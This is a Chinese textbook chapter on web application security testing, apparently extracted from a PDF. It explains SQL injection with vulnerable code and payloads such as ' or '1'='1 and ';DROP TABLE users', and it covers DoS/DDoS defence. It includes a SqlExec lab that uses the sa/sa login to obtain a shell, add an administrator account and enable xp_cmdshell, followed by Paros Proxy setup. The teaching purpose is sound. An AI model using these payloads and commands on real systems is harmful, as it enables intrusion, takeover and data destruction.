软件系统安全性测试

•.1.1 Web程序安全测试

Web程序安全测试中的 SQL注入式攻击测试和拒绝服务攻 击的防范。

1.1.1 SQL注入式攻击及测试

1 .什么是SQL注入式攻击

所谓SQL注入式攻击，就是指攻击者把

SQL命令插入到

欺骗服务器

Web表单的输入域或页面请求的查询字符串中， 执行恶意的 SQL命令。

在某些表单中，用户输入的内容直接用来构造(或者影响)

动态SQL命令，或作为存储过程的输入参数， 这类表单特别 容易受到SQL注入式攻击。常见的 SQL注入式攻击的过程 如下。 (1)某个ASP.NET Web 应用有一个登录页面，这个登录页 面控制着用户是否有权访问应用，它要求用户输入一个名称 和密码 2 ）“登录 ”页面中输入的内容将直接用来构造动态的 令，或者直接用作存储过程的参数。下面是

SQL 命

ASP .NET 应用

1 / 23

构造查询的一个例子。

System.Text.StringBuilder query = new System.Text.StringBuilder( \"SELECT * from Users WHERE login = '\") .Append(txtLogin.Text).Append(\"' AND password='\") .Append(txtPassword.Text).Append(\"'\");

3 ）攻击者在用户名和密码输入框中输入 \"' or '1'='1\" 之类的 内容。

4）将用户输入内容提交给服务器之后，服务器运行上面 的 ASP .NET 代码构造出查询用户的

SQL 命令，但由于攻击

者输入的内容非常特殊，所以最后得到的 SQL 命令变 成 SELECT *

from Users WHERE login='' or '1'='1' AND password='' or '1'='1'

。

5）服务器执行查询或存储过程，将用户输入的身份信息和 服务器中保存的身份信息进行对比。

6 ）由于 SQL 命令实际上已被注入式攻击修改， 已经不能真 正验证用户身份，所以系统会错误地授权给攻击者。 如果攻击者知道应用会将表单中输入的内容直接用于验证

2/ 23

身份查询，他就会尝试输入某些特殊的 SQL 字符串篡改查

询，改变其原来的功能，欺骗系统授予其访问权限。 系统环境不同， 攻击者可能造成的损害也不同， 这主要由应 用访问数据库的安全权限决定。 如果用户账户具有管理员或 其他比较高级的权限，攻击者就可能对数据库的表执行各 种他想要做的操作，包括添加、删除或更新数据，甚至可 能直接删除表。 SQL 注入式攻击的总体思路如下。 1 ）发现 SQL 的注入位置。 2）判断后台的数据库类型。

3 ）确定 XP_CMDSHELL 可执行的情况。 4 ）发现 Web 虚拟目录。 5 ）上传 ASP 木马。 6）得到管理员权限。

2．SQL 注入式攻击的种类 1）没有正确过滤转义字符

在用户的输入没有被转义字符过滤时，就会发生这种形式的

3/ 23

注入式攻击， 它会被传递给一个 SQL 语句。 这样就会导致应 用程序的终端用户对数据库上的语句实施操纵。比方说，上 面那段代码就会演示这种漏洞。 这种代码的设计目的是将一个特定用户从其用户表中取出， 但是如果用户名被一个恶意的用户用一种特定的方式伪造， 这个语句所执行的操作可能就不仅仅是代码的编写者所期望 的那样了。如果这种代码被用于一个认证过程，那么这个例 子就能够强迫选择一个合法的用户名， 因为 '1'='1' 永远是正确 的。 在一些 SQL 服务器上， 如在 SQL Server 中， 任何一个 SQL 命令都可以通过这种方法被注入， 包括执行多个语句。 例如：

statement:=\"SELECT * FROM users WHERE name=' \"+userName+\" ';\"

通过给userName 赋如下的值，将会导致删除 “ users表；同

时又可以从 “ data表中选择所有的数据（实际上就是透露了 每一个用户的信息） 。

这就将最终 SQL 语句变成下面这个样子。

SELECT * FROM users WHERE name='a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%';

2）非法类型处理

a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%

4/ 23

如果一个用户提供的字段并非一个强类型，或者没有实施类 型强制， 就会发生这种形式的攻击。 当在一个 SQL 语句中使 用一个数字字段时，如果程序员没有检查用户输入的合法性

是否为数字型） ，就会发生这种攻击。例如：

statement := \"SELECT * FROM data WHERE id=\"+a_variable+\":\"

从这个语句可以看出，作者希望a_variable是一个与“id?段

有关的数字。不过，如果终端用户选择一个字符串，就绕过 了对转义字符的需求。 例如， 将 a_variable 设置为： 1;DROP TABLE users，它会将“users表从数据库中删除，SQL语句变 成：

SELECT * FROM DATA WHERE id=1;DROP TABLE users;

5/ 23

3）数据库服务器中的漏洞

有时，数据库服务器软件中也存在着漏洞，如 mysql 服务器 中

mysql_real_escape_ string（） 函数的漏洞。这种漏洞允许 一个攻击者根据错误的统一字符编码执行一次成功的 SQL 注入式攻击。 4）盲目的 SQL 注入式攻击

当一个 Web 应用程序易于遭受攻击而其结果攻击者却不见 时，就会发生所谓的盲目的 SQL 注入式攻击。 有漏洞的网页 可能并不会显示数据，而是根据注入到合法语句中的逻辑语 句的结果显示不同的内容。这种攻击相当耗时，因为必须为 每一个获得的字节精心构造一个新的语句。但是一旦漏洞的 位置和目标信息的位置被确立以后， 一种称为 Absinthe 的工 具就可以使这种攻击自动化。 5）条件响应

注意，有一种 SQL 注入迫使数据库在一个普通的应用程序屏 幕上计算一个逻辑语句的值，如：

SELECT booktitle FROM booklist WHERE bookId='OOk14cd'AND 1=1;

6 / 23

这会导致一个标准页面，而语句

SELECT booktitle FROM

在页面易于

booklist WHERE bookId ='OOk14cd' AND 1=2

受到 SQL 注入式攻击时， 它有可能给出一个不同的结果。 这 样的一次注入将会证明盲目的 SQL 注入是可能的， 它会使攻 击者根据另外一个表中的某字段内容设计可以评判真伪的语 句。 6）条件性差错

如果 WHERE 语句为真，这种类型的盲目 SQL 注入会迫使 数据库评判一个引起错误的语句，从而导致一个 SQL 错误。 例 如 ， SELECT 1/0 FROM users WHERE username= 'Ralph' 。显然，如果用户 Ralph 存在的话，被零除将导致错 误。 7）时间延误

时间延误是一种盲目的 SQL 注入， 根据所注入的逻辑， 它可 以导致 SQL 引擎执行一个长队列或者是一个时间延误语句。 攻击者可以衡量页面加载的时间，从而决定所注入的语句是 否为真。

以上仅是对 SQL 攻击的粗略分类。 从技术上讲， 如今的 SQL

7 / 23

注入式攻击者们在如何找出有漏洞的网站方面更加聪明，也

更加全面， 现在已出现了一些新型的 SQL 攻击手段。 黑客们 可以使用各种工具来加速漏洞的利用过程。 我们不妨看看 the Asprox Trojan 这种木马， 它主要是通过一个发布邮件的僵尸 网络来传播，其整个工作过程可以这样描述：首先，通过受 到控制的主机发送的垃圾邮件将此木马安装到电脑上， 然后， 受到此木马感染的电脑会下载一段二进制代码， 在其启动时， 它会使用搜索引擎搜索用微软的 ASP 技术建立表单的、 有漏 洞的网站。 搜索的结果就成为 SQL 注入攻击的靶子清单。 接 着， 这个木马会向这些站点发动

SQL 注入式攻击， 使有些网

站受到控制、破坏。访问这些受到控制和破坏的网站的用户 将会受到欺骗，从另外一个站点下载一段恶意的 JavaScript 代码。最后，这段代码将用户指引到第三个站点，这里有更 多的恶意软件，如窃取口令的木马。 3．检查和防御 SQL 注入式攻击的方法

1）使用参数化的过滤性语句 要防御 SQL 注入式攻击， 用户的输入就绝对不能直接被嵌入 到 SQL 语句中。 恰恰相反， 用户的输入必须进行过滤，

或者

8 / 23

使用参数化的语句。参数化的语句使用参数而不是将用户输 入嵌入到语句中。 在多数情况中， 这样的 SQL 语句可以被修 正。下面是一个使用 Java 和 JDBC API 的例子。

PreparedStatement prep = conn.prepareStatement(\"SELECT * FROM USERS WHERE PASSWORD=?\"); prep.setString(1, pwd);

总体上讲， 有两种方法可以保证应用程序不易受到 SQL 注入 式攻击：一是使用代码复查，二是强迫使用参数化语句。强 迫使用参数化语句意味着嵌入用户输入的 SQL 语句在运行 时将被拒绝。 2) 避免使用解释程序

因为这正是黑客们借以执行非法命令的手段。 3) 避免出现一些详细的错误消息

因为黑客们可以利用这些消息，要使用一种标准的输入确认 机制来验证所有的输入数据的长度、类型、语句、企业规则 等。 4) 使用专业的漏洞扫描工具

9/ 23

攻击者们目前正在自动搜索攻击目标并实施攻击。其技术甚 至可以轻易地被应用于其他 Web 架构中的漏洞。 企业应当投 资一些专业的漏洞扫描工具， 如大名鼎鼎的 Acunetix 的 Web 漏洞扫描程序等。一个完善的漏洞扫描程序不同于网络扫描 程序，它专门查找网站上的 SQL 注入式漏洞。最新的漏洞 扫描程序可以查找最新发现的漏洞。 5）在 Web 应用程序开发过程的所有阶段实施代码的安全检 查

首先， 要在部署 Web 应用之前实施安全测试， 这种措施的意 义比以前更大、更深远。

其次，还应当在部署之后用漏洞扫描工具和站点监视工具对 网站进行测试。

1.1.2 拒绝服务攻击及检测

1．什么是拒绝服务攻击

拒绝服务，英文为 “ Denial of Service ，”也就是我们常说的 DoS 。那么什么是拒绝服务攻击呢？大家可以这样理解，凡 是能导致合法用户不能进行正常网络服务的行为都算是拒绝

服务攻击。拒绝服务攻击的目的非常明确，就是用超出被攻

击目标处理能力的海量数据包消耗可用系统、带宽资源，致 使网络服务瘫痪， 从而阻止合法用户对正常网络资源的访问， 达到攻击者不可告人的目的。

10 / 23

常见的 DoS 攻击有针对硬件（网络设备、路由器、交换机） 的 DoS 、针对网络层（ IP 协议）核心实现的 DoS 和针对应 用层（浏览器、 Web 服务器、 Mail ）的 DoS 。 2．从 DoS 到 DDoS

DDoS （ Distributed Denial of Service ，分布式拒绝服务）的 攻击方式虽然与 DoS 一样，也是向被攻击目标连续发送大量 的 IP 包， 以导致服务器不能为合法用户提供正常服务， 但是 它区别于 DoS 的绝妙之处在于动员了大量 “无辜 ”的计算机向 目标共同发起进攻，采用分布式拒绝服务攻击手段。

DDoS 与 DoS 的最大区别就是人多力量大。原来的 DoS 是 一台机器攻击目标，现在的 DDoS 是很多台机器利用它们的 高带宽攻击目标， 更容易将目标网站攻克。 除此之外， DDoS 攻击方式较为自动化，攻击者可以把他的程序安装到网络中 的多台机器上，所采用的攻击工具使被攻击对象难以察觉，

只要攻击者发出攻击命令，这些机器便发起进攻

DDoS 的表现形式主要有两种：一种为流量攻击，主要是针 对网络带宽的攻击，即大量攻击包导致网络带宽被阻塞，合 法网络包被虚假的攻击包淹没而

11 / 23

无法到达主机；另一种为资 源耗尽攻击，主要是针对服务器主机的攻击，即通过大量攻 击包导致主机的内存被耗尽或 CPU 被内核及应用程序占完 而无法提供网络服务。

3．DoS/DDoS 的防范

对付 DoS/DDoS 是一个系统工程， 想仅仅依靠某种系统或产 品防住 DDoS 是不现实的，可以肯定的是，完全杜绝 DDoS 是不可能的， 但通过适当措施抵御 90% 的 DDoS 攻击是可以 做到的。基于攻击和防御都有成本开销的缘故，若通过适当 的办法增强抵御 DDoS 的能力，也就意味着加大了攻击者的 攻击成本， 那么绝大多数攻击者将无法继续下去而最终放弃， 也就相当于抵御了 DDoS 攻击。下面为大家介绍一些抵御 DDoS 的方法和建议。

1）采用高性能的网络设备 首先要保证网络设备不能成为瓶颈，因此选择路由器、交换

机、硬件防火墙等设备的时候要尽量选用知名度高、口碑好 的产品。再就是利用和网络提供商的特殊关系或协议，当大 量攻击发生的时候请他们在网络接点处做一下流量来对 抗某些种类的 DDoS 攻击是非常有效的。

2）尽量避免使用 NAT 无论是路由器还是硬件防护墙设备，要尽量避免采用网络地 址转换 NAT 的使用，因为采用此技术会降低网络通信

12 / 23

能力， 因为 NAT 需要对地址来回转换， 转换过程中需要对网络包进 行校验和计算，因此浪费了很多 CPU 的时间，但有些时候 必须使用 NAT ，那就没有别的办法了。

3）充足的网络带宽保证 网络带宽直接决定了能抗受攻击的能力，假如仅仅 有 10MB 带宽的话，无论采取什么措施都很难对抗现在的攻 击，当前至少要选择 100MB 共享带宽，最好的当然是挂在 1000MB 的主干上。但需要注意的是，主机上的网卡是 1000MB 并不意味着它的网络带宽就是千兆字节的，若把它 接到 100MB 的交换机上，它的实际带宽不会超过 100MB ， 再就是接在 100MB 的带宽上也不等于就有了百兆字节的带

13 / 23

宽，因为网络服务商很可能会在交换机上实际宽带为 10MB，这点一定要搞清楚。 4） 升级主机服务器硬件

在有网络带宽保证的前提下，请尽量提升硬件配置。 5） 把网站做成静态页面

大量事实证明，把网站尽可能做成静态页面，不仅能大大提 高抗攻击能力，而且还给黑客入侵带来不少麻烦，像新浪、 搜狐、网易等很多门户网站主要都是静态页面。若确定需要 动态脚本调用，则把它设置到另外一台单独主机上，免得遭 受攻击时连累主服务器。此外，最好在需要调用数据库的脚 本中拒绝使用代理访问，因为经验表明使用代理访问网站的 80%属于恶意行为。

! 1.2 SqlExec工具的使用

本节将介绍 SqlExec 工具，以及如何使用 SQL Server数据库服务器实施攻击。 1. SqlExec 简介

SqlExec 工具对

SqlExec是专门在SQL服务器上执行 DOS命令的工具，体积

14 / 23

很小，不用安装。 SqlExec有GUI和命令行两种方式，能够 通过Pipe或TCP/IP两种模式连接 MS SQL Server服务器 来执行DOS命令。

2. 实验简介

安装微软的SQL Server数据库，在配置系统默认账号 密码时，不少用户选择空密码，或者密码设置得比较简单， 这样就给系统留下了非常大的安全隐患。本例将给大家演示 如何使用SqlExec工具给微软 SQL Server所在的被攻击主 机增加一个系统管理员账号。 SqlExec工具的主界面如图

1.1所示

图1.1 SqlExec的主界面 3．攻击过程

15 / 23

sa的

数据库账号 sa 的密码可以通过相应工具获得，如 X-scan 。 本例假设已获取了 sa 账号的密码为 sa 。

1 ）输入主机的 IP 地址： 192.168.1.182 。

2 ）输入用户名和密码： User 为 sa ； Pass 为 sa 。 3 ）单击 Connect 按钮。

4 ）在 CMD 中获得了被攻击主机的 Shell ，输入 net start ， 按 Enter 键，可以检查被攻击主机的系统进程。 5 ）给被攻击系统增加一个管理员用户（在

CMD 中）。

① 输入 “net user ”，按 Enter 键，可得到被攻击主机的系统 用户信息。

② 输入 “net user btest btestpass /add

”，按 Enter 键，提示

命令成功完成，增加普通用户，用户名为 btest ，密码为 btestpass 。 ③ 输入 “net user ”，按 Enter 键，可看到被攻击主机的系统用 户中增加了 btest 用户。

④ 输入 “net user btest ”，按 Enter 键，可看到此用户不属于

16 / 23

admi nistrators 组。

⑤ 输入 net localgroup administrators btest /add ”，按 Enter 键，将此用户添加到管理员组。

⑥ 输入net user btest ”，按 Enter键，可看到此用户属于 administrators 组，即btest用户已经是系统管理员了。

如果在运行时返回 SQL_ERROR ，可能是因为目标主机未开 启xp_cmdshell ，可通过在目标主机的 下命令开启 xp_cmdshell 。

SQL Server中运行如

exec sp_c on figure 'show adva need opti on s', 1; recon figure; exec sp_c on figure 'xp_cmdshell', 1; recon figure;

xp_cmdshell是一个系统存储过程， Shell并以字符串的形式传递以便执行， 的行返回。

可以生成Windows命令

任何输出都作为文本

I 1.3 使用Paros Proxy工具进行测试

Paros Proxy 是一个对 Web应用程序的漏洞进行评估的代理

17 / 23

程序，即一个基于 Java 的 Web 代理程序， 可以评估 Web 应 用程序的漏洞。它支持动态地编辑

/查看 HTTP/HTTPS ，从

而改变 Cookies 和表单字段等项目。它包括一个 Web 通信 记录程序、 Web 圈套程序（ spider ）、 hash 计算器，还有一 个可以测试常见的 Web 应用程序攻击（如 SQL 注入攻击和 跨站脚本攻击）的扫描器。该工具检查漏洞形式包括： SQL 注入、跨站脚本攻击、目录遍历等。

1．安装 Paros Proxy 1）安装 JRE

首先确保已安装 JRE [Java Run Time Enviroment （JRE） 1.4 （or above） ] 。

2）配置 JRE 环境变量 首先，右击 我的电脑”选择 属性高级环境变量”进入

环境变量设置对话框。

设置 PATH 环境变量， 在 PATH 环境变量中输入 JRE 的安装 路径。

如 JRE 的安装目录为：

c:\\JRE ，则在 PATH 环境变量中加入

18 / 23

c:\\JRE

新建CLASSPATH 环境变量，在 CLASSPATH 环境变量中 输入JRE下面的LIB路径 接下来安装和配置

Paros Proxy 应用程序

3 ）开始安装 Paros Proxy

如果下载的是 Windows版本，安装比较简单， 直接运行安装并按照安装向导完成安装即可。

如果下载的是 UNIX或其他平台的版本，则需要手动将程序 解压到一个新的目录，并单击 」AR文件运行程序。

Paros Proxy 的运行界面如图

1.2所示。

图 1.2 Paros Proxy 的主界面

19 / 23

程序

4 ）配置 Paros Proxy

Paros Proxy 需要两个端口， 默认是 8080 和 8443, 其中 8080 是代理连接端口， 8443 是 SSL 端口，所以必须保证这两个 端口未被其他程序占用。 查看端口命令的方法为： 打开 DOS 命令窗口，输入 netstat 查看目前使用的端口。

如果安装完成 ,启动应用程序时，出现初始化错误，极可能就 是因为这个端口被其他程序占用。 5）配置浏览器属性

打开浏览器（如IE）,打开工具”宀选项”宀连接”宀局域网 设置”，选中 “代理服务器 ”，设置代理服务器地址为 localhost ， 端口为 8080 。

如果你的计算机运行于防火墙之下，只能通过公司的代理服 务器访问网络，则还需要修改 Paros Proxy 的代理设置，具 体的方法是：打开 Paros Proxy，选择 Tools宀Options，在 打开的对话框中选择 Connection ，如图 1.3 所示，修改 Address/Domain Name 和 Port 为代理服务器的名称和端口

20 / 23

图1.3 Paros Proxy 代理设置

如果希望其他平台可以通过你本地机上的

Paros Proxy来访

问Web服务器，则需要将本地机上的 Paros Proxy 的本地代 理IP设置为本机IP（比如：192.168.0.1 ）而不是127.0.0.1 : 因为127.0.0.1只允许本地机使用该应用程序。具体操作方

法为：打开 Paros Proxy，选择 Tools宀Options，在打开的 对话框中选择 Local proxy，将Address 设置为本机IP，如 图1.4所示。

21 / 23

图1.4 Paros Proxy 本地代理 2. Paros Proxy的操作步骤

(1) 打开Paros Proxy,然后在浏览器中打开被测试程序。 (2) 使用 Spider 抓取 URL。

执行第一步后，系统会自动抓取被测试站点位于 中第一层的 URL (比如一个网站，其首页的

URL层次树 URL 一般为层

次树第一层)，并将这些 URL显示在左侧的 “ site^中，然后 在site栏中选中某一个 URL，右击选取 Spider命令或选择 Analyse菜单下面的 Spider命令，系统将抓取该 URL层次树 中下一层次的 URL。 3 ）针对 Sites 栏中的 URL 进行扫描，逐一对 URL 进行安 全检查，验证是否存在安全漏洞。

如果想扫描 Sites栏中所有的 URL ,单击 Anaylse f Sean All 可以启

22 / 23

动全部扫描。如果只想扫描 Sites 栏中某一 URL ，选 中该 URL ，单击 Anaylse f Sean 启动扫描。

我们可以通过 Anylse f Sean Poliey 进行安全检查的设置。 4） 查看和验证扫描结果。

扫描完成后，单击 Report f Last Sean Report ，可查看当前 的扫描报告。根据扫描报告，对扫描结果进行验证，比如扫 描结果中有一 URL 传递的参数中存在 SQL 注入漏洞，我们 将该 URL 及参数输入到地址栏中，验证结果。 5） 保存抓取、扫描内容。

保存时应注意：保存的路径不支持特殊字符，比如汉字等， 否则可能会打不开保存后的文件。

23 / 23